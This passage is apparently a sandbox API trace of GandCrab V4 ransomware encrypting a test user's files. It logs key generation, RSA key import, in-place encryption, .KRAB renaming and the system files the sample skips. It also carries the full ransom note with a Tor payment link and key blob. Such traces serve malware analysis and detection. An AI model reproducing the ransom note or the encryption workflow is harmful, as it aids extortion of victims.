lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0075.999] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.003] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.005] CloseHandle (hObject=0x420) returned 1 [0076.013] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.014] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx.krab")) returned 1 [0076.015] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.015] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0076.015] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0076.015] CloseHandle (hObject=0x3ac) returned 1 [0076.015] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.015] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0076.015] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0076.016] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="UProof" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof" [0076.016] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\" [0076.016] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.016] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.016] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.016] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.016] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.016] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.016] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.017] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\\\KRAB-DECRYPT.txt") returned 72 [0076.017] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0076.019] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.019] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.019] CloseHandle (hObject=0x3ac) returned 1 [0076.020] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.020] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.020] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0xdc)) [0076.020] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.020] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.021] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.021] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock") returned 78 [0076.021] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x420 [0076.026] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.026] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\") returned 55 [0076.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*" [0076.027] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x10238b8 [0076.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.027] FindNextFileW (in: hFindFile=0x10238b8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.027] FindNextFileW (in: hFindFile=0x10238b8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.027] lstrcmpW (lpString1="CUSTOM.DIC", lpString2=".") returned 1 [0076.027] lstrcmpW (lpString1="CUSTOM.DIC", lpString2="..") returned 1 [0076.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="CUSTOM.DIC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" [0076.027] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.027] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.KRAB") returned 70 [0076.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0076.027] lstrlenW (lpString=".DIC") returned 4 [0076.027] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.028] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".DIC ") returned 5 [0076.028] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0076.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 65 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="desktop.ini") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="autorun.inf") returned 1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="iconcache.db") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="bootsect.bak") returned 1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="boot.ini") returned 1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat.log") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="thumbs.db") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="KRAB-DECRYPT.html") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="KRAB-DECRYPT.txt") returned -1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.028] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntldr") returned -1 [0076.029] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="NTDETECT.COM") returned -1 [0076.029] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Bootfont.bin") returned 1 [0076.029] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.029] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011810) returned 1 [0076.033] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.033] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.034] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.034] CryptGenRandom (in: hProv=0x1011810, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0076.034] CryptReleaseContext (hProv=0x1011810, dwFlags=0x0) returned 1 [0076.034] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.034] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011810) returned 1 [0076.037] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.038] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.038] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.038] CryptGenRandom (in: hProv=0x1011810, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0076.038] CryptReleaseContext (hProv=0x1011810, dwFlags=0x0) returned 1 [0076.038] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.038] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0076.042] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10238f8) returned 1 [0076.042] CryptGetKeyParam (in: hKey=0x10238f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0076.042] CryptEncrypt (in: hKey=0x10238f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0076.045] GetLastError () returned 0x0 [0076.045] CryptDestroyKey (hKey=0x10238f8) returned 1 [0076.045] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0076.045] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10112c0) returned 1 [0076.049] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10238f8) returned 1 [0076.049] CryptGetKeyParam (in: hKey=0x10238f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0076.049] CryptEncrypt (in: hKey=0x10238f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0076.050] GetLastError () returned 0x0 [0076.050] CryptDestroyKey (hKey=0x10238f8) returned 1 [0076.050] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0076.050] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0076.050] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0076.050] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0076.051] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x1e, lpOverlapped=0x0) returned 1 [0076.079] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffffe2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.079] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x1e, lpOverlapped=0x0) returned 1 [0076.079] WriteFile (in: hFile=0x474, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0076.079] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.084] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.084] CloseHandle (hObject=0x474) returned 1 [0076.087] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.097] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\custom.dic.krab")) returned 1 [0076.132] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.134] FindNextFileW (in: hFindFile=0x10238b8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.134] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.134] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock" [0076.134] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.135] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0076.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\d2ca4a08d2ca4dee3d.lock") returned 78 [0076.135] lstrlenW (lpString=".lock") returned 5 [0076.135] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.135] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.135] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.136] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.136] FindNextFileW (in: hFindFile=0x10238b8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.136] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.136] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.136] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt" [0076.136] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.136] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt.KRAB") returned 76 [0076.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt") returned 71 [0076.137] lstrlenW (lpString=".txt") returned 4 [0076.137] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.137] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.137] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt") returned 71 [0076.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\KRAB-DECRYPT.txt") returned 71 [0076.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.138] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.138] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.138] FindNextFileW (in: hFindFile=0x10238b8, 